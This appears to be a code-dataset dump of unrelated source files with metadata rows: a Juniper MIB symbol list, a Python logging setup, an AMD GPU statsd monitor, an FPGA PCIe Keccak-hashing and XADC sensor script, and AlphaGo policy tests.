jnxMbgSgwPPUnknMsgRx=jnxMbgSgwPPUnknMsgRx, jnxMbgSgwGtpV2ICsNOTFTUECTXTx=jnxMbgSgwGtpV2ICsNOTFTUECTXTx, jnxMbgSgwPPDelBrReqRx=jnxMbgSgwPPDelBrReqRx, jnxMbgSgwGtpV2ICsManIEMissRx=jnxMbgSgwGtpV2ICsManIEMissRx, jnxMbgSgwDelIndTunReqRx=jnxMbgSgwDelIndTunReqRx, jnxMbgSgwGtpV2ICsReqAcceptRx=jnxMbgSgwGtpV2ICsReqAcceptRx, jnxMbgSgwPPUpdBrRspRx=jnxMbgSgwPPUpdBrRspRx, jnxMbgSgwIfGtpV2ICsMisUnknAPNTx=jnxMbgSgwIfGtpV2ICsMisUnknAPNTx, jnxMbgSgwPPGtpV1ErrIndRx=jnxMbgSgwPPGtpV1ErrIndRx, jnxMbgSgwGtpPeerName=jnxMbgSgwGtpPeerName, jnxMbgSgwDelBrReqTx=jnxMbgSgwDelBrReqTx, jnxMbgSgwIfGtpV2ICsManIEIncorTx=jnxMbgSgwIfGtpV2ICsManIEIncorTx, jnxMbgSgwIfGtpV2ICsSemErTADRx=jnxMbgSgwIfGtpV2ICsSemErTADRx, jnxMbgSgwIfGtpV2ICsDenINRatRx=jnxMbgSgwIfGtpV2ICsDenINRatRx, jnxMbgSgwIfUpdBrRspRx=jnxMbgSgwIfUpdBrRspRx, jnxMbgSgwPPCrtBrReqRx=jnxMbgSgwPPCrtBrReqRx, 
jnxMbgSgwGtpV2ICsTFTSysErrTx=jnxMbgSgwGtpV2ICsTFTSysErrTx, jnxMbgSgwIfPcktLenErrRx=jnxMbgSgwIfPcktLenErrRx, jnxMbgSgwIfGtpV2ICsRelocFailTx=jnxMbgSgwIfGtpV2ICsRelocFailTx, jnxMbgSgwIfGtpV2ICsReqAcceptTx=jnxMbgSgwIfGtpV2ICsReqAcceptTx, jnxMbgSgwPPPiggybackMsgRx=jnxMbgSgwPPPiggybackMsgRx, jnxMbgSgwDelSessRspTx=jnxMbgSgwDelSessRspTx, jnxMbgSgwPPDelBrReqTx=jnxMbgSgwPPDelBrReqTx, jnxMbgSgwGtpV2ICsTFTSMANTErRx=jnxMbgSgwGtpV2ICsTFTSMANTErRx, jnxMbgSgwPPGtpV2ICsUERefusesTx=jnxMbgSgwPPGtpV2ICsUERefusesTx, jnxMbgSgwGtpV2ICsNoResRx=jnxMbgSgwGtpV2ICsNoResRx, jnxMbgSgwIfDelBrReqRx=jnxMbgSgwIfDelBrReqRx, jnxMbgSgwGtpV2ICsRMValRcvRx=jnxMbgSgwGtpV2ICsRMValRcvRx, jnxMbgSgwGtpV2ICsUnabPageUERx=jnxMbgSgwGtpV2ICsUnabPageUERx, jnxMbgSgwIfGtpV2ICsNewPTNPrefTx=jnxMbgSgwIfGtpV2ICsNewPTNPrefTx, jnxMbgSgwPPBrResCmdTx=jnxMbgSgwPPBrResCmdTx, jnxMbgSgwIfDlDataNotifTx=jnxMbgSgwIfDlDataNotifTx, jnxMbgSgwPacketAllocFail=jnxMbgSgwPacketAllocFail, jnxMbgSgwPPGtpV2ICsSemErTADRx=jnxMbgSgwPPGtpV2ICsSemErTADRx, jnxMbgSgwPPDlDataNotiFlrIndTx=jnxMbgSgwPPDlDataNotiFlrIndTx, jnxMbgSgwIfUpdConnSetRspTx=jnxMbgSgwIfUpdConnSetRspTx, jnxMbgSgwGtpV2ICsIMSINotKnTx=jnxMbgSgwGtpV2ICsIMSINotKnTx, jnxMbgSgwGtpV2ICsSemErTADRx=jnxMbgSgwGtpV2ICsSemErTADRx, jnxMbgSgwPPGtpV2ICsLclDetRx=jnxMbgSgwPPGtpV2ICsLclDetRx, jnxMbgSgwIfUpdConnSetReqTx=jnxMbgSgwIfUpdConnSetReqTx, jnxMbgSgwIfPacketSendFail=jnxMbgSgwIfPacketSendFail, jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx=jnxMbgSgwIfGtpV2ICsNPTSIAdbrRx, jnxMbgSgwIfGtpV2ICsAcceptPartTx=jnxMbgSgwIfGtpV2ICsAcceptPartTx, jnxMbgSgwPPUpdConnSetRspRx=jnxMbgSgwPPUpdConnSetRspRx, jnxMbgSgwDelIndTunRespRx=jnxMbgSgwDelIndTunRespRx, jnxMbgSgwPPSuspNotifTx=jnxMbgSgwPPSuspNotifTx, jnxMbgSgwIfUpdConnSetRspRx=jnxMbgSgwIfUpdConnSetRspRx, jnxMbgSgwGtpV2ICsInvMsgFmtRx=jnxMbgSgwGtpV2ICsInvMsgFmtRx, jnxMbgSgwIfGtpV2ICsAPNAcsDenTx=jnxMbgSgwIfGtpV2ICsAPNAcsDenTx, jnxMbgSgwDelBrFlrIndTx=jnxMbgSgwDelBrFlrIndTx, jnxMbgSgwIfIndex=jnxMbgSgwIfIndex, jnxMbgSgwGtpV1T3RespTmrExpRx=jnxMbgSgwGtpV1T3RespTmrExpRx, 
jnxMbgSgwPPCreateSessRspTx=jnxMbgSgwPPCreateSessRspTx, jnxMbgSgwPPDelBrCmdTx=jnxMbgSgwPPDelBrCmdTx, jnxMbgSgwIfStopPagingIndTx=jnxMbgSgwIfStopPagingIndTx, jnxMbgSgwPPGtpV2ICsRelocFailRx=jnxMbgSgwPPGtpV2ICsRelocFailRx, jnxMbgSgwPPGtpV2ICsInvMsgFmtTx=jnxMbgSgwPPGtpV2ICsInvMsgFmtTx, jnxMbgSgwIfGtpV2ICsDenINRatTx=jnxMbgSgwIfGtpV2ICsDenINRatTx, jnxMbgSgwPPGtpV2ICsISRDeactRx=jnxMbgSgwPPGtpV2ICsISRDeactRx, jnxMbgSgwPPBrResCmdRx=jnxMbgSgwPPBrResCmdRx, jnxMbgSgwPPGtpV2ICsNoResTx=jnxMbgSgwPPGtpV2ICsNoResTx, jnxMbgSgwPPGtpV2ICsAllDynAdOcRx=jnxMbgSgwPPGtpV2ICsAllDynAdOcRx, jnxMbgSgwIfGtpV2ICsDtForNtSupTx=jnxMbgSgwIfGtpV2ICsDtForNtSupTx, jnxMbgSgwIfV2NumMsgTx=jnxMbgSgwIfV2NumMsgTx, jnxMbgSgwIfGtpV2ICsInvLenTx=jnxMbgSgwIfGtpV2ICsInvLenTx, jnxMbgSgwDlDataNotiFlrIndTx=jnxMbgSgwDlDataNotiFlrIndTx, jnxMbgSgwIfGtpV2ICsRPrNtRspTx=jnxMbgSgwIfGtpV2ICsRPrNtRspTx, jnxMbgSgwGtpV2ICsDeniedINRatTx=jnxMbgSgwGtpV2ICsDeniedINRatTx, jnxMbgSgwGtpV2ICsProtoNtSupRx=jnxMbgSgwGtpV2ICsProtoNtSupRx, jnxMbgSgwPPModBrFlrIndRx=jnxMbgSgwPPModBrFlrIndRx, jnxMbgSgwV2VerNotSupRx=jnxMbgSgwV2VerNotSupRx, jnxMbgSgwPPGtpV1EndMarkerRx=jnxMbgSgwPPGtpV1EndMarkerRx, jnxMbgSgwGtpV2ICsISRDeactTx=jnxMbgSgwGtpV2ICsISRDeactTx, jnxMbgSgwGtpV2ICsServDeniedRx=jnxMbgSgwGtpV2ICsServDeniedRx, jnxMbgSgwIfDlDataNotiFlrIndTx=jnxMbgSgwIfDlDataNotiFlrIndTx, jnxMbgSgwCrIndTunReqTx=jnxMbgSgwCrIndTunReqTx, jnxMbgSgwGtpV2ICsUserAUTHFlTx=jnxMbgSgwGtpV2ICsUserAUTHFlTx, jnxMbgSgwPPV2NumBytesRx=jnxMbgSgwPPV2NumBytesRx, jnxMbgSgwS4PiggybackMsgRx=jnxMbgSgwS4PiggybackMsgRx, jnxMbgSgwIfDlDataAckTx=jnxMbgSgwIfDlDataAckTx, jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx=jnxMbgSgwIfGtpV2ICsGREKeyNtFdRx, jnxMbgSgwGtpV2ICsISRDeactRx=jnxMbgSgwGtpV2ICsISRDeactRx, jnxMbgSgwIfDelSessReqTx=jnxMbgSgwIfDelSessReqTx, jnxMbgSgwIfRelAcsBrReqTx=jnxMbgSgwIfRelAcsBrReqTx, jnxMbgSgwDelSessRspRx=jnxMbgSgwDelSessRspRx, jnxMbgSgwPPModBrRspTx=jnxMbgSgwPPModBrRspTx, jnxMbgSgwIfV2EchoRespRx=jnxMbgSgwIfV2EchoRespRx, jnxMbgSgwBrResCmdRx=jnxMbgSgwBrResCmdRx, 
jnxMbgSgwPPGtpV2ICsAPNResTIncTx=jnxMbgSgwPPGtpV2ICsAPNResTIncTx, jnxMbgSgwPPGtpV2ICsInvTotLenRx=jnxMbgSgwPPGtpV2ICsInvTotLenRx, jnxMbgSgwGtpV2ICsUnPgUESusRx=jnxMbgSgwGtpV2ICsUnPgUESusRx, jnxMbgSgwIfGtpV2ICsOptIEIncorTx=jnxMbgSgwIfGtpV2ICsOptIEIncorTx, jnxMbgSgwGtpV2ICsCmpDetTx=jnxMbgSgwGtpV2ICsCmpDetTx, jnxMbgSgwModBrFlrIndRx=jnxMbgSgwModBrFlrIndRx, jnxMbgSgwIfGtpV2ICsRMValRcvTx=jnxMbgSgwIfGtpV2ICsRMValRcvTx, jnxMbgSgwGtpCPerPeerStatsTable=jnxMbgSgwGtpCPerPeerStatsTable, jnxMbgSgwGtpInterfaceType=jnxMbgSgwGtpInterfaceType, jnxMbgSgwPPGtpV2ICsServNotSupTx=jnxMbgSgwPPGtpV2ICsServNotSupTx, jnxMbgSgwPPBrResFlrIndRx=jnxMbgSgwPPBrResFlrIndRx, jnxMbgSgwIfGtpV2ICsCondIEMsRx=jnxMbgSgwIfGtpV2ICsCondIEMsRx, jnxMbgSgwIfGtpV2ICsAPNResTIncTx=jnxMbgSgwIfGtpV2ICsAPNResTIncTx, jnxMbgSgwIfGtpV2ICsISRDeactTx=jnxMbgSgwIfGtpV2ICsISRDeactTx, jnxMbgSgwUpdBrReqRx=jnxMbgSgwUpdBrReqRx, jnxMbgSgwV2EchoRespRx=jnxMbgSgwV2EchoRespRx, jnxMbgSgwIfGtpV2ICsUnabPageUETx=jnxMbgSgwIfGtpV2ICsUnabPageUETx, jnxMbgSgwV2NumBytesTx=jnxMbgSgwV2NumBytesTx, jnxMbgSgwIfBrResFlrIndTx=jnxMbgSgwIfBrResFlrIndTx, jnxMbgSgwPPCreateSessRspRx=jnxMbgSgwPPCreateSessRspRx, jnxMbgSgwPPGtpV2ICsReqAcceptTx=jnxMbgSgwPPGtpV2ICsReqAcceptTx, jnxMbgSgwIfGtpV2ICsVerNotSuppRx=jnxMbgSgwIfGtpV2ICsVerNotSuppRx, jnxMbgSgwPPGtpV2ICsReqRejTx=jnxMbgSgwPPGtpV2ICsReqRejTx, jnxMbgSgwIfT3RespTmrExpRx=jnxMbgSgwIfT3RespTmrExpRx, jnxMbgSgwPPUpdConnSetRspTx=jnxMbgSgwPPUpdConnSetRspTx, jnxMbgSgwPPGtpRmtAddr=jnxMbgSgwPPGtpRmtAddr, jnxMbgSgwGtpGlbStatsEntry=jnxMbgSgwGtpGlbStatsEntry, jnxMbgSgwGtpV2ICsEIFRNCEnRx=jnxMbgSgwGtpV2ICsEIFRNCEnRx, jnxMbgSgwIfCrIndTunRespRx=jnxMbgSgwIfCrIndTunRespRx, jnxMbgSgwGtpV2ICsRPrNtRspRx=jnxMbgSgwGtpV2ICsRPrNtRspRx, jnxMbgSgwPPGtpRtgInst=jnxMbgSgwPPGtpRtgInst)
| 130.12168 | 14,121 | 0.801753 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 55,361 | 0.205435 |
5e2c57a108833725810c97a24dfaf30c42381529 | 2,074 | py | Python | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 13 | 2019-09-14T16:51:35.000Z | 2021-03-03T22:20:44.000Z | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 15 | 2019-09-29T19:25:31.000Z | 2022-02-13T16:40:45.000Z | bot/cogs/utils/logging.py | Kobu/MasarykBOT | 9a6b6a026b4f39afaca5ab509c90f6da09e169a0 | [
"MIT"
] | 15 | 2019-09-18T10:50:59.000Z | 2022-02-11T20:55:19.000Z | import logging
import os
from logging import FileHandler, Formatter
from logging.handlers import TimedRotatingFileHandler
from pathlib import Path
from rich.logging import RichHandler
def my_namer(default_name):
    """Rename rotated log files from ``name.date1.ext.date2`` to ``name.date2.ext``.

    TimedRotatingFileHandler appends the rollover date *after* the file
    extension (e.g. ``bot.2021-01-01.log.2021-01-02``); this namer moves
    the rollover date in front of the extension instead
    (``bot.2021-01-02.log``).
    """
    # The handler's default name has exactly four dot-separated parts:
    # base name, original date stamp, extension, rollover date.
    stem, _old_stamp, suffix, rollover_date = default_name.split(".")
    return "{}.{}.{}".format(stem, rollover_date, suffix)
def setup_logging():
    """Configure the root logger with console and file handlers.

    File log lines look like::

        2019-09-29 18:51:04 | INFO    |            logger.py:12   | Beginning backup

    Handlers installed on the root logger:
      * RichHandler                -- console, INFO and above
      * TimedRotatingFileHandler   -- logs/bot.<date>.log, DEBUG and above,
        rotated at midnight and renamed via :func:`my_namer`
      * FileHandler                -- logs/warn.log, WARNING and above
    """
    # Local import instead of the original inline __import__("datetime")
    # hack; only needed to build the dated log file name.
    from datetime import datetime

    # Quieten chatty third-party loggers.
    logging.getLogger('discord').setLevel(logging.WARNING)
    logging.getLogger('discord.http').setLevel(logging.WARNING)
    logging.getLogger("asyncio").setLevel(logging.INFO)
    log = logging.getLogger()

    shell_handler = RichHandler()

    filename = Path("logs", datetime.now().strftime('bot.%Y-%m-%d.log'))
    os.makedirs(os.path.dirname(filename), exist_ok=True)
    all_file_handler = TimedRotatingFileHandler(filename, when='midnight')
    all_file_handler.namer = my_namer

    filename = Path("logs", "warn.log")
    os.makedirs(os.path.dirname(filename), exist_ok=True)
    warn_file_handler = FileHandler(filename, mode='a')

    log.setLevel(logging.DEBUG)
    shell_handler.setLevel(logging.INFO)
    all_file_handler.setLevel(logging.DEBUG)
    warn_file_handler.setLevel(logging.WARNING)

    fmt_date = '%Y-%m-%d %H:%M:%S'
    fmt_shell = '{message}'
    fmt_file = '{asctime} | {levelname:<7} | {filename:>20}:{lineno:<4} | {message}'
    shell_handler.setFormatter(Formatter(fmt_shell, fmt_date, style='{'))
    all_file_handler.setFormatter(Formatter(fmt_file, fmt_date, style='{'))
    warn_file_handler.setFormatter(Formatter(fmt_file, fmt_date, style='{'))

    log.addHandler(shell_handler)
    log.addHandler(all_file_handler)
    log.addHandler(warn_file_handler)
| 35.758621 | 109 | 0.72324 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 630 | 0.303761 |
5e2e4d1334a3040d22f87965b228ed511a22030b | 3,018 | py | Python | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | amdtemp/amdtemp.py | micaelbergeron/amdtemp | 8bea1ae19f0837b105f83d7c9e107491f82ea094 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import anyconfig
import re
import time
import importlib
import pdb
from select import poll, POLLIN
from statsd import StatsClient
def import_class(klass):
    """Resolve a dotted path such as ``'pkg.mod.Class'`` to the named object."""
    # Split off the attribute name after the last dot; everything before it
    # is the importable module path.
    module_path, _, attr_name = klass.rpartition('.')
    return getattr(importlib.import_module(module_path), attr_name)
# Default configuration, printed verbatim when the program is invoked
# without arguments.  A raw string keeps the regex backslashes (\d, \s)
# literal without relying on Python's lenient handling of unrecognized
# escape sequences, which is deprecated and slated to become a SyntaxError.
sample_cfg = r"""
verbose=false
[statsd]
host="127.0.0.1"
port=8127
prefix="amdtemp.gpu"
[metrics.card0.temp]
path="/sys/class/drm/card0/device/hwmon/hwmon2/temp1_input"
[metrics.card0.pwm]
path="/sys/class/drm/card0/device/hwmon/hwmon2/pwm1"
[metrics.card0.memory]
path="/sys/class/drm/card0/device/pp_dpm_mclk"
parser="amdtemp.parsers.RegexParser"
[metrics.card0.memory.parser_options]
regex='(?P<power_state>\d):\s(?P<current_clck>\d+)[KMG]?hz\s\*'
[metrics.card0.core]
path="/sys/class/drm/card0/device/pp_dpm_sclk"
parser="amdtemp.parsers.RegexParser"
[metrics.card0.core.parser_options]
regex='(?P<power_state>\d):\s(?P<current_clck>\d+)[KMG]?hz\s\*'
"""
VERBOSE=False
class Metric:
    """A single sysfs-backed metric: a name, a sysfs file path and a parser."""

    def __init__(self, name, path, parser="amdtemp.parsers.IntParser", parser_options=None):
        # ``parser_options`` defaults to None instead of a shared mutable
        # dict (the original used a mutable default argument).
        self.name = name
        self.path = path
        options = parser_options if parser_options is not None else {}
        # Resolve the dotted parser class path and instantiate it.
        self.parser = import_class(parser)(name, **options)

    def poll(self):
        """Read the sysfs file once and return the parsed field dict."""
        with open(self.path, "r") as f:
            raw = f.read()
        if VERBOSE: print("Raw input (%s): %s" % (self.name, raw))
        return self.parser.parse(raw)

    def __str__(self):
        # Bug fix: the original referenced the bare names ``name``/``path``
        # (a NameError at runtime); use the instance attributes instead.
        return "Metric (%s), located at %s." % (self.name, self.path)
def record(client, fields):
    """Send every ``metric -> value`` pair in *fields* as a statsd gauge.

    *client* may be a StatsClient or a pipeline obtained from one; only its
    ``gauge(name, value)`` method is used.
    """
    if VERBOSE:
        # Idiom fix: plain loop instead of a list comprehension that was
        # built only for its print() side effects.
        for metric, value in fields.items():
            print("%s: %d" % (metric, value))
    for metric, value in fields.items():
        client.gauge(metric, value)
def monitor(config):
    """Poll every configured metric once per second and ship the readings
    to statsd, batching each sweep into a single pipeline."""
    client = StatsClient(**config['statsd'])
    sources = get_sources_list(config)
    while True:
        # One pipeline per sweep so all gauges go out in a single batch.
        with client.pipeline() as batch:
            for metric_group in sources.values():
                if VERBOSE:
                    print("Recording...")
                for metric in metric_group:
                    fields = metric.poll()
                    if VERBOSE:
                        print(fields)
                    record(batch, fields)
        time.sleep(1)
def get_sources_list(config):
    """Build ``{source_name: [Metric, ...]}`` from the ``[metrics.*]``
    sections of the configuration.

    Each metric's name is prefixed with its source, e.g. ``card0.temp``.
    """
    sources = {}
    for source_name, metric_sections in config['metrics'].items():
        sources[source_name] = [
            Metric('.'.join((source_name, metric_name)), **metric_cfg)
            for metric_name, metric_cfg in metric_sections.items()
        ]
    return sources
# Command-line help text, printed for -h/--help/--usage.
usage = """
AMDTemp
This program uses the amdgpu sysfs interface to collect gpu information and send
over a statsd server.
Usage: amdtemp <configfile>
A sample config will be output when called without arguments.
"""
def main():
    """Entry point: parse argv, load the config file and start monitoring.

    * no arguments        -- print the sample configuration and exit 0
    * -h/--help/--usage   -- print the usage text and exit 1
    * <configfile>        -- load it (any format anyconfig supports) and monitor
    """
    # Bug fix: without this declaration the assignment below created a
    # function-local VERBOSE, so the module-level flag consulted by
    # Metric.poll(), record() and monitor() was never updated.
    global VERBOSE
    if len(sys.argv) == 1:
        print(sample_cfg)
        exit(0)
    if re.match(r"(-h|--help|--usage)", sys.argv[1]):
        print(usage)
        exit(1)
    config = anyconfig.load(sys.argv[1])
    VERBOSE = config.get('verbose', False)
    if VERBOSE:
        print(config)
    monitor(config)
| 25.576271 | 97 | 0.643804 | 506 | 0.167661 | 0 | 0 | 0 | 0 | 0 | 0 | 1,068 | 0.353877 |
5e2e945dd5aa5dbaa28763805003a91fd6eda97e | 5,523 | py | Python | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | 1 | 2019-12-26T17:30:35.000Z | 2019-12-26T17:30:35.000Z | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | null | null | null | keccak256hash_pcie.py | shahbaazlokh/Picoevb_Keccak256hash_Pcie_ipi | e813ae8f706b9e1f1a44edef5c0fe18677a39820 | [
"MIT"
] | 1 | 2021-03-27T22:02:50.000Z | 2021-03-27T22:02:50.000Z |
#!/usr/bin/env python3
import os
import time
import binascii
import codecs
def swap_order(d, wsz=16, gsz=2 ):
return "".join(["".join([m[i:i+gsz] for i in range(wsz-gsz,-gsz,-gsz)]) for m in [d[i:i+wsz] for i in range(0,len(d),wsz)]])
expected_genesis_hash = "00000009c4e61bee0e8d6236f847bb1dd23f4c61ca5240b74852184c9bf98c30"
blockheader1 = "020000005bf0e2f283edac06ea087a9324dc9bd865c79b175658849bd83900000000000085246da7e6e530d276d5f8e0d4222cb8938f7af0e9d6678ec08ff133812f4b7251e8e35cec16471af51dd61c"
expected_hash1 = "00000000623c9e9d39c1fb7ab7290b3014b6348d10c54aa6ab6fc408385dfaa6"
def read_fpga_temprature():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
temp = os.pread(fd,32,0x0000 + 0x200)[::-1] # read temerature out from temperature register
temp_reg = int.from_bytes(temp, "big")
t = ((int(temp_reg)/65536.0)/0.00198421639) - 273.15
# print("--------------------------------------")
print ("Temperature : {} Celsius".format(t))
# print("--------------------------------------")
os.close(fd)
# Read FPGA MAX Temprature
def read_fpga_maxtemprature():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
temp = os.pread(fd,32,0x0000 + 0x280)[::-1] # read maxtemerature out from temperature register
temp_reg = int.from_bytes(temp, "big")
t = ((int(temp_reg)/65536.0)/0.00198421639) - 273.15
# print("--------------------------------------")
print ("Temperature Max: {} Celsius".format(t))
# print("--------------------------------------")
os.close(fd)
# Read vccint voltage
def read_fpga_VCCINT():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vint_temp = os.pread(fd,32,0x0000 + 0x204)[::-1] # read voltage out from vccint register
volt_int = int.from_bytes(vint_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCINT : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
# # Read max vccint voltage
# def read_fpga_maxVCCINT():
# #XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# # open port and then read from dedicated register
# fd = os.open("/dev/xdma0_user", os.O_RDWR)
# vint_temp = os.pread(fd,32,0x0000 + 0x284)[::-1] # read max voltage out from vccint register
# volt_int = int.from_bytes(vint_temp, "big")
# print(volt_int)
# vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
# print ("VCCINT max: {0:.04f} V".format(vint))
# print("--------------------------------------")
# os.close(fd)
# Read vccaux , read fpga auxillary volatges
def read_fpga_VCCAUX():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vaux_temp = os.pread(fd,32,0x0000 + 0x208)[::-1] # read voltage out from vccaux register
volt_int = int.from_bytes(vaux_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCAUX : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
def read_fpga_VCCBRAM():
#XADC IP is connected to xdma pcie IP via axi4-lite interface on base-addr 0x40000000
# open port and then read from dedicated register
fd = os.open("/dev/xdma0_user", os.O_RDWR)
vbram_temp = os.pread(fd,32,0x0000 + 0x218)[::-1] # read voltage out from vccbram register
volt_int = int.from_bytes(vbram_temp, "big")
vint = ((volt_int) * 3.0)/65536.0
# print("--------------------------------------")
print ("VCCBRAM : {0:.04f} V".format(vint))
# print("--------------------------------------")
os.close(fd)
def hash_genesis_block():
blockheader = ("02000000" +
"a4051e368bfa0191e6c747507dd0fdb03da1a0a54ed14829810b97c6ac070000" +
"e932b0f6b8da85ccc464d9d5066d01d904fb05ae8d1ddad7095b9148e3f08ba6" +
"bcfb6459" +
"f0ff0f1e" +
"3682bb08")
print("txdata:%s" %blockheader)
blockheader_bin = binascii.unhexlify(swap_order(blockheader))
tx_data = blockheader_bin
# Open files
fd_h2c = os.open("/dev/xdma/card0/h2c0", os.O_WRONLY)
fd_c2h = os.open("/dev/xdma/card0/c2h0", os.O_RDONLY)
start_time = time.time()
# Send to FPGA
os.pwrite(fd_h2c, tx_data, 0)
# Receive from FPGA
rx_data = os.pread(fd_c2h, 32, 0)
end_time = time.time()
delay = end_time -start_time
blockheder_rx = codecs.encode(rx_data,'hex').decode('ascii')
print("rxdata:%s" %swap_order(blockheder_rx)[0:64])
print("Time elapsed:%f microsec" %(delay*1000000))
os.close(fd_h2c)
os.close(fd_c2h)
##############################################
def main():
hash_genesis_block()
read_fpga_temprature()
read_fpga_maxtemprature()
read_fpga_VCCINT()
read_fpga_VCCAUX()
read_fpga_VCCBRAM()
##############################################
if __name__ == '__main__':
main()
| 40.313869 | 177 | 0.60927 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 3,081 | 0.557849 |
5e3240efc103a1b22b47cef9a9d5b727a615ddff | 3,311 | py | Python | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | tests/test_policy.py | forkedOrg/RocAlphaGo | a727763ea0b73ac984d13f81329d99c9a8a620c0 | [
"MIT"
] | null | null | null | from AlphaGo.models.policy import CNNPolicy
from AlphaGo import go
from AlphaGo.go import GameState
from AlphaGo.ai import GreedyPolicyPlayer, ProbabilisticPolicyPlayer
import numpy as np
import unittest
import os
class TestCNNPolicy(unittest.TestCase):
	"""Smoke tests for CNNPolicy: evaluation, output shape and persistence."""

	def test_default_policy(self):
		# Constructing and evaluating a fresh state should simply not raise.
		net = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])
		net.eval_state(GameState())

	def test_batch_eval_state(self):
		net = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])
		batch_results = net.batch_eval_state([GameState(), GameState()])
		# One result per input state, each covering all 19x19 moves.
		self.assertEqual(len(batch_results), 2)
		self.assertEqual(len(batch_results[0]), 361)

	def test_output_size(self):
		# The flattened output must match the board area for each board size.
		for size in (19, 13):
			net = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"], board=size)
			out = net.forward(net.preprocessor.state_to_tensor(GameState(size)))
			self.assertEqual(out.shape, (1, size * size))

	def test_save_load(self):
		net = CNNPolicy(["board", "liberties", "sensibleness", "capture_size"])

		model_file = 'TESTPOLICY.json'
		weights_file = 'TESTWEIGHTS.h5'
		model_file2 = 'TESTPOLICY2.json'
		weights_file2 = 'TESTWEIGHTS2.h5'

		# Persist model and weights separately, then both together.
		net.save_model(model_file)
		net.model.save_weights(weights_file)
		net.save_model(model_file2, weights_file2)

		# Both round-trips must yield identical weights.
		loaded_a = CNNPolicy.load_model(model_file)
		loaded_a.model.load_weights(weights_file)
		loaded_b = CNNPolicy.load_model(model_file2)
		for w_a, w_b in zip(loaded_a.model.get_weights(), loaded_b.model.get_weights()):
			self.assertTrue(np.all(w_a == w_b))

		# Clean up the temporary files.
		for path in (model_file, weights_file, model_file2, weights_file2):
			os.remove(path)
class TestPlayers(unittest.TestCase):
	"""Tests for the greedy and probabilistic policy players.

	The four tests shared two near-identical bodies; the common logic is
	factored into two private helpers so each player type is exercised
	through the same code path.
	"""

	def _play_some_moves(self, player, n_moves=20):
		# Shared body of the two "plays legal moves" tests: the player must
		# always produce a (non-None) move for an ongoing game.
		gs = GameState()
		for i in range(n_moves):
			move = player.get_move(gs)
			self.assertIsNotNone(move)
			gs.do_move(move)

	def _assert_passes_on_almost_full_board(self, player):
		# Shared body of the two "sensible" tests: with every point but one
		# occupied by black, the only sensible action is to pass (None).
		gs = GameState()
		empty = (10, 10)
		for x in range(19):
			for y in range(19):
				if (x, y) != empty:
					gs.do_move((x, y), go.BLACK)
		gs.current_player = go.BLACK
		self.assertIsNone(player.get_move(gs))

	def test_greedy_player(self):
		policy = CNNPolicy(["board", "ones", "turns_since"])
		self._play_some_moves(GreedyPolicyPlayer(policy))

	def test_probabilistic_player(self):
		policy = CNNPolicy(["board", "ones", "turns_since"])
		self._play_some_moves(ProbabilisticPolicyPlayer(policy))

	def test_sensible_probabilistic(self):
		policy = CNNPolicy(["board", "ones", "turns_since"])
		self._assert_passes_on_almost_full_board(ProbabilisticPolicyPlayer(policy))

	def test_sensible_greedy(self):
		policy = CNNPolicy(["board", "ones", "turns_since"])
		self._assert_passes_on_almost_full_board(GreedyPolicyPlayer(policy))
# Allow running this test module directly (outside a test runner).
if __name__ == '__main__':
	unittest.main()
| 30.943925 | 88 | 0.725461 | 3,045 | 0.919662 | 0 | 0 | 0 | 0 | 0 | 0 | 565 | 0.170643 |
5e3257003e9364f1ddaf4c5be9cb5b8665d4201c | 1,840 | py | Python | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | 1 | 2017-06-30T07:32:07.000Z | 2017-06-30T07:32:07.000Z | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | null | null | null | conference/factories.py | mattaustin/django-conference | 9606724aaf2351e78269fabc8c81c0898e727635 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright 2016 Matt Austin
#
